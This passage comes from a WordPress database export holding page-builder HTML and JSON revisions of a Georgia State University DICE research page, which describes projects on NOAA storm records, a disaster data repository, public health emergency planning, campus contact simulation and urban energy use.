v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:36:20','2023-09-29 14:36:20','',126,'https://gsudice.dataconn.net/?p=1462',0,'revision','',0),(1468,1,'2023-09-29 10:37:07','2023-09-29 14:37:07','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:37:07','2023-09-29 14:37:07','',438,'https://gsudice.dataconn.net/?p=1468',0,'revision','',0),(1469,1,'2023-09-29 10:37:07','2023-09-29 14:37:07','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg h-col-md h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n       